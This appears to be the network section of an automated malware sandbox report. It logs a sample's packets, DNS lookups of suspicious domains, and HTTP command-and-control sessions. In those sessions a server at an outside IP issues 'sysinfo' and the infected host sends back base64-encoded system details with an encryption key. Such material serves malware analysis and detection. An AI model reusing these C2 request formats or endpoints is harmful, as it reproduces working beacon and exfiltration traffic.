Mar 31, 2025 11:38:07.102431059 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.102535963 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.118999958 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.119102001 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.206500053 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.206656933 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.222310066 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.222354889 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.318439960 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.318521023 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.745358944 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.745701075 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.847825050 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.847980976 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.870526075 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.870640039 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.950918913 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.951050043 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:07.971822977 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:07.971873999 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.053787947 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.053961039 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.075680971 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.075831890 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.155044079 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.155195951 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.174520016 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.174609900 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.202836037 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.202958107 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.261800051 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.261887074 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.277400970 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.277486086 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.305766106 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.305789948 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.305824041 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.305927038 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.364542007 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.364665985 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.376256943 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.376348972 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.406476021 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.418452024 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.418525934 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.470449924 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.516515970 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.519687891 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.519710064 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.519855022 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.537316084 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.537333012 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.537432909 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.618643999 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.626936913 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.626944065 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.627160072 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.658838987 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.660538912 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.660700083 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.727899075 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.727910995 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.728032112 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.742010117 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.742017984 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.742080927 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.771496058 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.771502972 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.771774054 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.827703953 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.827712059 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.827832937 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.842299938 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.842308998 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.842389107 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.871823072 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.871830940 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.871931076 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.929068089 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.929075956 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.929188967 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.943320036 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.943330050 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.943429947 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.971978903 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.971987009 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:08.972088099 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:08.999583960 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.033185005 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.033195019 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.033458948 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.044692039 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.044699907 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.044769049 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.074901104 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.074911118 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.075025082 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.124469995 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.132471085 CEST	43384	443	192.168.2.14	54.247.62.1
Mar 31, 2025 11:38:09.147546053 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.147555113 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.147605896 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.147605896 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.176084995 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.176096916 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.176141024 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.177151918 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.250281096 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.251470089 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.265736103 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.265925884 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.279567957 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.279709101 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.352230072 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.352241039 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.352302074 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.352302074 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.363817930 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.363827944 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.363936901 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.383547068 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.424494028 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.452132940 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.464679003 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.464704037 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.464854002 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.527278900 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.527306080 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.527441025 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.584929943 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.584956884 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.585086107 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.585086107 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.624654055 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.624676943 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.624804974 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.625735044 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.673528910 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.674644947 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.680576086 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.680685043 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.712155104 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.712429047 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.718913078 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.764131069 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.764271975 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.769987106 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.799021006 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.799316883 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.850259066 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.850272894 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.850400925 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.889492989 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.889508009 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.889749050 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.906733036 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.940654993 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.940670013 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.940737009 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:09.979350090 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.979378939 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:09.979406118 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.028453112 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.033672094 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.033687115 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.033783913 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.081499100 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.081525087 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.081644058 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.131026030 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.137363911 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.137382984 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.137554884 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.185056925 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.185089111 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.185558081 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.241230965 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.241245985 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.241349936 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.255728006 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.255740881 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.255815983 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.291882992 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.291919947 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.291984081 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.349275112 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.349320889 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.349471092 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.359951019 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.359973907 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.360060930 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.393389940 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.393404961 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.393562078 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.720520020 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.720719099 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.821422100 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.821582079 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.922349930 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.922504902 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.935992956 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:10.936196089 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:10.942981958 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:11.043972015 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:11.044436932 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:11.044451952 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:11.044543982 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:17.831060886 CEST	40758	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:17.982084036 CEST	80	40758	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:17.982175112 CEST	40758	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:17.992909908 CEST	40758	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:18.187253952 CEST	80	40758	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:18.228631973 CEST	80	40758	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:18.228892088 CEST	40758	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:18.287075996 CEST	80	40758	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:18.310532093 CEST	40758	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:18.457241058 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:18.457288980 CEST	80	40758	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:18.457329035 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:18.560925961 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:18.560944080 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:18.560980082 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:18.561090946 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:18.561873913 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:18.561960936 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:21.070976973 CEST	40760	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:21.213093996 CEST	80	40760	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:21.213202953 CEST	40760	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:21.216588974 CEST	40760	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:21.400404930 CEST	80	40760	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:21.446110964 CEST	80	40760	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:21.446191072 CEST	40760	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:21.446973085 CEST	40760	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:21.591538906 CEST	80	40760	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:21.982316971 CEST	80	40760	152.36.128.18	192.168.2.14
Mar 31, 2025 11:38:21.982470036 CEST	40760	80	192.168.2.14	152.36.128.18
Mar 31, 2025 11:38:37.564238071 CEST	59334	443	192.168.2.14	34.254.182.186
Mar 31, 2025 11:38:37.564296961 CEST	443	59334	34.254.182.186	192.168.2.14
Mar 31, 2025 11:38:37.564394951 CEST	59334	443	192.168.2.14	34.254.182.186
Mar 31, 2025 11:38:37.567025900 CEST	59334	443	192.168.2.14	34.254.182.186
Mar 31, 2025 11:38:37.567048073 CEST	443	59334	34.254.182.186	192.168.2.14
Mar 31, 2025 11:39:37.562501907 CEST	59334	443	192.168.2.14	34.254.182.186
Mar 31, 2025 11:39:37.604286909 CEST	443	59334	34.254.182.186	192.168.2.14
Mar 31, 2025 11:40:23.196533918 CEST	46510	80	192.168.2.14	52.26.80.133
Mar 31, 2025 11:40:23.437427998 CEST	80	46510	52.26.80.133	192.168.2.14
Mar 31, 2025 11:40:23.437669039 CEST	46510	80	192.168.2.14	52.26.80.133
Mar 31, 2025 11:40:23.439924955 CEST	46510	80	192.168.2.14	52.26.80.133
Mar 31, 2025 11:40:23.675359964 CEST	80	46510	52.26.80.133	192.168.2.14
Mar 31, 2025 11:40:23.675429106 CEST	80	46510	52.26.80.133	192.168.2.14
Mar 31, 2025 11:40:23.675440073 CEST	80	46510	52.26.80.133	192.168.2.14
Mar 31, 2025 11:40:23.675647974 CEST	46510	80	192.168.2.14	52.26.80.133
Mar 31, 2025 11:40:23.677014112 CEST	46510	80	192.168.2.14	52.26.80.133
Mar 31, 2025 11:40:23.906965017 CEST	80	46510	52.26.80.133	192.168.2.14
Mar 31, 2025 11:40:24.304008007 CEST	44132	80	192.168.2.14	85.214.228.140
Mar 31, 2025 11:40:24.500343084 CEST	80	44132	85.214.228.140	192.168.2.14
Mar 31, 2025 11:40:24.500606060 CEST	44132	80	192.168.2.14	85.214.228.140
Mar 31, 2025 11:40:24.502275944 CEST	44132	80	192.168.2.14	85.214.228.140
Mar 31, 2025 11:40:24.689703941 CEST	80	44132	85.214.228.140	192.168.2.14
Mar 31, 2025 11:40:24.689996004 CEST	80	44132	85.214.228.140	192.168.2.14
Mar 31, 2025 11:40:24.690007925 CEST	80	44132	85.214.228.140	192.168.2.14
Mar 31, 2025 11:40:24.690085888 CEST	44132	80	192.168.2.14	85.214.228.140
Mar 31, 2025 11:40:24.690737009 CEST	44132	80	192.168.2.14	85.214.228.140
Mar 31, 2025 11:40:24.695561886 CEST	35212	80	192.168.2.14	172.16.3.2
Mar 31, 2025 11:40:24.717751026 CEST	443	59334	34.254.182.186	192.168.2.14
Mar 31, 2025 11:40:24.878895998 CEST	80	44132	85.214.228.140	192.168.2.14
Mar 31, 2025 11:40:25.698704958 CEST	35212	80	192.168.2.14	172.16.3.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 31, 2025 11:40:22.887933969 CEST	36645	53	192.168.2.14	8.8.8.8
Mar 31, 2025 11:40:22.986330986 CEST	53	36645	8.8.8.8	192.168.2.14
Mar 31, 2025 11:40:22.987843037 CEST	44448	53	192.168.2.14	8.8.8.8
Mar 31, 2025 11:40:23.092986107 CEST	53	44448	8.8.8.8	192.168.2.14
Mar 31, 2025 11:40:23.095566034 CEST	36531	53	192.168.2.14	8.8.8.8
Mar 31, 2025 11:40:23.195322990 CEST	53	36531	8.8.8.8	192.168.2.14
Mar 31, 2025 11:40:23.677649021 CEST	55310	53	192.168.2.14	8.8.8.8
Mar 31, 2025 11:40:24.196644068 CEST	53	55310	8.8.8.8	192.168.2.14
Mar 31, 2025 11:40:24.199069977 CEST	52100	53	192.168.2.14	8.8.8.8
Mar 31, 2025 11:40:24.302802086 CEST	53	52100	8.8.8.8	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 31, 2025 11:40:22.887933969 CEST	192.168.2.14	8.8.8.8	0x159f	Standard query (0)	xinchaodbcfda.com	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:22.987843037 CEST	192.168.2.14	8.8.8.8	0x159f	Standard query (0)	xinchaodbcfda.net	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:23.095566034 CEST	192.168.2.14	8.8.8.8	0x159f	Standard query (0)	xinchaodbcfda.net	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:23.677649021 CEST	192.168.2.14	8.8.8.8	0x159f	Standard query (0)	xindbcfda.org	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:24.199069977 CEST	192.168.2.14	8.8.8.8	0x159f	Standard query (0)	xindbcfda.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 31, 2025 11:40:22.986330986 CEST	8.8.8.8	192.168.2.14	0x159f	Name error (3)	xinchaodbcfda.com	none	none	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:23.092986107 CEST	8.8.8.8	192.168.2.14	0x159f	No error (0)	xinchaodbcfda.net		52.26.80.133	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:23.195322990 CEST	8.8.8.8	192.168.2.14	0x159f	No error (0)	xinchaodbcfda.net		52.26.80.133	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:24.196644068 CEST	8.8.8.8	192.168.2.14	0x159f	No error (0)	xindbcfda.org		85.214.228.140	A (IP address)	IN (0x0001)	false
Mar 31, 2025 11:40:24.302802086 CEST	8.8.8.8	192.168.2.14	0x159f	No error (0)	xindbcfda.org		85.214.228.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

152.36.128.18

xinchaodbcfda.net

xindbcfda.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.14	40758	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Mar 31, 2025 11:38:17.992909908 CEST	76	OUT	GET /cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA HTTP/1.0 Host: 152.36.128.18
Mar 31, 2025 11:38:18.228631973 CEST	179	IN	HTTP/1.1 200 OK Date: Mon, 31 Mar 2025 09:38:18 GMT Server: Apache/2.4.41 (Win64) Content-Length: 7 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 73 79 73 69 6e 66 6f Data Ascii: sysinfo

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.14	40760	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Mar 31, 2025 11:38:21.216588974 CEST	727	OUT	GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSANCg0KL3Vzci9zYmluLw0KIDA0OjM4OjIwIHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiA2LjM0LCAyLjQ1LCAwLjg5fDE3NDM0MTM5MDANCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=HG6TD1RQ3I303VPA&h=galassia&enckey=vMZ4j7wVt0TOGgrBVyLGT+o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM= HTTP/1.0 Host: 152.36.128.18
Mar 31, 2025 11:38:21.446110964 CEST	224	IN	HTTP/1.1 200 OK Date: Mon, 31 Mar 2025 09:38:21 GMT Server: Apache/2.4.41 (Win64) Content-Length: 3 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a Data Ascii: ok!Content-type: text/html; charset=windows-1251

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.14	46510	52.26.80.133	80

Timestamp	Bytes transferred	Direction	Data
